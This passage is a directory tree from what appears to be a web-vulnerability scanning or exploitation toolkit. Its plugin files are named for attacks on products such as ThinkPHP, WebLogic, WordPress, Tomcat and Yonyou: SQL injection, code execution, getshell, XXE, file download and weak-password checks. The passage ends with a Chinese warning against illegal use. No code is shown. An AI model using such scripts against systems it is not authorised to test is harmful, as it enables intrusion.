│  └─__pycache__reinstall_getshell.cpython-37.pyctcexam_reinstall_getshell.cpython-37.pyc
│
├─thinkphp
│  │  code_exec.py
│  │  onethink_category_sqli.py
│  │  v5x_code_exec.py
│  │
│  └─__pycache__code_exec.cpython-37.pyconethink_category_sqli.cpython-37.pycthinkphp_code_exec.cpython-37.pycthinkphp_v5x_code_exec.cpython-37.pycthinkphp_v5x_code_exec_1.cpython-37.pycthinkphp_v5x_code_exec_2.cpython-37.pycthinkphp_v5_exec.cpython-37.pycv5x_code_exec.cpython-37.pyc
│
├─thinksns
│  │  category_code_exec.py
│  │
│  └─__pycache__category_code_exec.cpython-37.pycthinksns_category_code_exec.cpython-37.pyc
│
├─tomcat
│  │  put_exec.py
│  │
│  └─__pycache__put_exec.cpython-37.pyctomcat_put_exec.cpython-37.pyctomcat_weak_pass.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─topsec
│  │  change_lan_filedownload.py
│  │
│  └─__pycache__change_lan_filedownload.cpython-37.pyctopsec_change_lan_filedownload.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─trs
│  │  ids_auth_disclosure.py
│  │  infogate_register.py
│  │  infogate_xxe.py
│  │  inforadar_disclosure.py
│  │  lunwen_papercon_sqli.py
│  │  was40_passwd_disclosure.py
│  │  was40_tree_disclosure.py
│  │  was5_config_disclosure.py
│  │  was5_download_templet.py
│  │  wcm_default_user.py
│  │  wcm_infoview_disclosure.py
│  │  wcm_pre_as_lfi.py
│  │  wcm_service_writefile.py
│  │
│  └─__pycache__ids_auth_disclosure.cpython-37.pycinfogate_register.cpython-37.pycinfogate_xxe.cpython-37.pycinforadar_disclosure.cpython-37.pyclunwen_papercon_sqli.cpython-37.pyctrs_ids_auth_disclosure.cpython-37.pyctrs_infogate_register.cpython-37.pyctrs_infogate_xxe.cpython-37.pyctrs_inforadar_disclosure.cpython-37.pyctrs_lunwen_papercon_sqli.cpython-37.pyctrs_was40_passwd_disclosure.cpython-37.pyctrs_was40_tree_disclosure.cpython-37.pyctrs_was5_config_disclosure.cpython-37.pyctrs_was5_download_templet.cpython-37.pyctrs_wcm_default_user.cpython-37.pyctrs_wcm_infoview_disclosure.cpython-37.pyctrs_wcm_pre_as_lfi.cpython-37.pyctrs_wcm_service_writefile.cpython-37.pycwas40_passwd_disclosure.cpython-37.pycwas40_tree_disclosure.cpython-37.pycwas5_config_disclosure.cpython-37.pycwas5_download_templet.cpython-37.pycwcm_default_user.cpython-37.pycwcm_infoview_disclosure.cpython-37.pycwcm_pre_as_lfi.cpython-37.pycwcm_service_writefile.cpython-37.pyc
│
├─typecho
│  │  install_code_exec.py
│  │
│  └─__pycache__install_code_exec.cpython-37.pyctypecho_install_code_exec.cpython-37.pyc
│
├─umail
│  │  physical_path.py
│  │  sessionid_access.py
│  │
│  └─__pycache__physical_path.cpython-37.pycsessionid_access.cpython-37.pycumail_physical_path.cpython-37.pycumail_sessionid_access.cpython-37.pyc
│
├─urp
│  │  query.py
│  │  query2.py
│  │  ReadJavaScriptServlet_fileread.py
│  │
│  └─__pycache__query.cpython-37.pycquery2.cpython-37.pycReadJavaScriptServlet_fileread.cpython-37.pycurp_query.cpython-37.pycurp_query2.cpython-37.pycurp_ReadJavaScriptServlet_fileread.cpython-37.pyc
│
├─v2tech
│  │  v2Conference_sqli_xxe.py
│  │
│  └─__pycache__v2Conference_sqli_xxe.cpython-37.pyc
│
├─viewgood
│  │  pic_proxy_sqli.py
│  │  two_sqli.py
│  │  viewgood_GetCaption_sqli.py
│  │
│  └─__pycache__pic_proxy_sqli.cpython-37.pyctwo_sqli.cpython-37.pycviewgood_GetCaption_sqli.cpython-37.pycviewgood_pic_proxy_sqli.cpython-37.pycviewgood_two_sqli.cpython-37.pyc
│
├─weaver_oa
│  │  code_exec.py
│  │  db_disclosure.py
│  │  download_sqli.py
│  │  filedownload.py
│  │
│  └─__pycache__code_exec.cpython-37.pycdb_disclosure.cpython-37.pycdownload_sqli.cpython-37.pycfiledownload.cpython-37.pycweaver_oa_db_disclosure.cpython-37.pycweaver_oa_download_sqli.cpython-37.pycweaver_oa_filedownload.cpython-37.pyc
│
├─weblogic
│  │  interface_disclosure.py
│  │  ssrf.py
│  │  weak_pass.py
│  │  weblogic_CVE_2018_2628.py
│  │  ws_utc_xxe.py
│  │  xmldecoder_exec.py
│  │
│  └─__pycache__interface_disclosure.cpython-37.pycssrf.cpython-37.pycweak_pass.cpython-37.pycweblogic_CVE_2018_2628.cpython-37.pycweblogic_interface_disclosure.cpython-37.pycweblogic_ssrf.cpython-37.pycweblogic_weak_pass.cpython-37.pycweblogic_ws_utc_xxe.cpython-37.pycweblogic_xmldecoder_exec.cpython-37.pycws_utc_xxe.cpython-37.pycxmldecoder_exec.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─wecenter
│  │  topic_id_sqli.py
│  │
│  └─__pycache__topic_id_sqli.cpython-37.pycwecenter_topic_id_sqli.cpython-37.pyc
│
├─weway
│  │  PictureView1_filedownload.py
│  │
│  └─__pycache__PictureView1_filedownload.cpython-37.pycweway_PictureView1_filedownload.cpython-37.pyc
│
├─wizbank
│  │  download_filedownload.py
│  │  usr_id_sqli.py
│  │
│  └─__pycache__download_filedownload.cpython-37.pycusr_id_sqli.cpython-37.pycwizbank_download_filedownload.cpython-37.pycwizbank_usr_id_sqli.cpython-37.pyc
│
├─wordpress
│  │  admin_ajax_filedownload.py
│  │  display_widgets_backdoor.py
│  │  plugin_azonpop_sqli.py
│  │  plugin_mailpress_rce.py
│  │  plugin_ShortCode_lfi.py
│  │  restapi_sqli.py
│  │  url_redirect.py
│  │  woocommerce_code_exec.py
│  │
│  └─__pycache__admin_ajax_filedownload.cpython-37.pycdisplay_widgets_backdoor.cpython-37.pycplugin_azonpop_sqli.cpython-37.pycplugin_mailpress_rce.cpython-37.pycplugin_ShortCode_lfi.cpython-37.pycrestapi_sqli.cpython-37.pycurl_redirect.cpython-37.pycwoocommerce_code_exec.cpython-37.pycwordpress_admin_ajax_filedownload.cpython-37.pycwordpress_display_widgets_backdoor.cpython-37.pycwordpress_plugin_azonpop_sqli.cpython-37.pycwordpress_plugin_mailpress_rce.cpython-37.pycwordpress_plugin_ShortCode_lfi.cpython-37.pycwordpress_restapi_sqli.cpython-37.pycwordpress_url_redirect.cpython-37.pycwordpress_woocommerce_code_exec.cpython-37.pyc
│
├─xplus
│  │  mysql_mssql_sqli.py
│  │  v2003_getshell.py
│  │
│  └─__pycache__mysql_mssql_sqli.cpython-37.pycv2003_getshell.cpython-37.pycxplus_2003_getshell.cpython-37.pycxplus_mysql_mssql_sqli.cpython-37.pyc
│
├─yonyou
│  │  a8_CmxUser_sqli.py
│  │  a8_getshell.py
│  │  a8_logs_disclosure.py
│  │  a8_personService_xxe.py
│  │  cm_info_content_sqli.py
│  │  createMysql_disclosure.py
│  │  ehr_ELTextFile.py
│  │  ehr_resetpwd_sqli.py
│  │  fe_treeXml_sqli.py
│  │  getemaildata_fileread.py
│  │  icc_struts2.py
│  │  initData_disclosure.py
│  │  multi_union_sqli.py
│  │  nc_NCFindWeb_fileread.py
│  │  status_default_pwd.py
│  │  test_sqli.py
│  │  user_ids_sqli.py
│  │  yonyou_nc_Unauthorized.py
│  │
│  └─__pycache__a8_CmxUser_sqli.cpython-37.pyca8_getshell.cpython-37.pyca8_logs_disclosure.cpython-37.pyca8_personService_xxe.cpython-37.pyccm_info_content_sqli.cpython-37.pyccreateMysql_disclosure.cpython-37.pycehr_ELTextFile.cpython-37.pycehr_resetpwd_sqli.cpython-37.pycfe_treeXml_sqli.cpython-37.pycgetemaildata_fileread.cpython-37.pycicc_struts2.cpython-37.pycinitData_disclosure.cpython-37.pycmulti_union_sqli.cpython-37.pycnc_NCFindWeb_fileread.cpython-37.pycstatus_default_pwd.cpython-37.pyctest_sqli.cpython-37.pycu8_CmxItem.cpython-37.pycu8_CmxItem_sqli.cpython-37.pycuser_ids_sqli.cpython-37.pycyonyou_a8_CmxUser_sqli.cpython-37.pycyonyou_a8_logs_disclosure.cpython-37.pycyonyou_a8_personService_xxe.cpython-37.pycyonyou_cm_info_content_sqli.cpython-37.pycyonyou_createMysql_disclosure.cpython-37.pycyonyou_ehr_ELTextFile.cpython-37.pycyonyou_ehr_resetpwd_sqli.cpython-37.pycyonyou_fe_treeXml_sqli.cpython-37.pycyonyou_getemaildata_fileread.cpython-37.pycyonyou_icc_struts2.cpython-37.pycyonyou_initData_disclosure.cpython-37.pycyonyou_multi_union_sqli.cpython-37.pycyonyou_nc_NCFindWeb_fileread.cpython-37.pycyonyou_nc_Unauthorized.cpython-37.pycyonyou_status_default_pwd.cpython-37.pycyonyou_test_sqli.cpython-37.pycyonyou_u8_CmxItem_sqli.cpython-37.pycyonyou_user_ids_sqli.cpython-37.pyc
│
├─zabbix
│  │  jsrpc_profileIdx2_sqli.py
│  │
│  └─__pycache__jsrpc_profileIdx2_sqli.cpython-37.pyczabbix_jsrpc_profileIdx2_sqli.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─zfsoft
│  │  database_control.py
│  │  default3_bruteforce.py
│  │
│  ├─xml
│  │      zfsoft_service_stryhm_sqli_false.xml
│  │      zfsoft_service_stryhm_sqli_true.xml
│  │
│  └─__pycache__database_control.cpython-37.pycdefault3_bruteforce.cpython-37.pycservice_stryhm_sqli.cpython-37.pyczfsoft_database_control.cpython-37.pyczfsoft_default3_bruteforce.cpython-37.pyczfsoft_service_stryhm_sqli.cpython-37.pyc
│
├─zookeeper
│  │  unauth.py
│  │
│  └─__pycache__unauth.cpython-37.pyczookeeper_unauth.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─zuitu
│  │  coupon_id_sqli.py
│  │
│  └─__pycache__coupon_id_sqli.cpython-37.pyczuitu_coupon_id_sqli.cpython-37.pyc
│
└─__pycache__
cmsmain.cpython-37.pyc
Plugins.cpython-37.pyc
systemmain.cpython-37.pyc
__init__.cpython-37.pyc

警告!

请勿用于非法用途!否则自行承担一切后果

如果觉得我的文章对你有用,请随意赞赏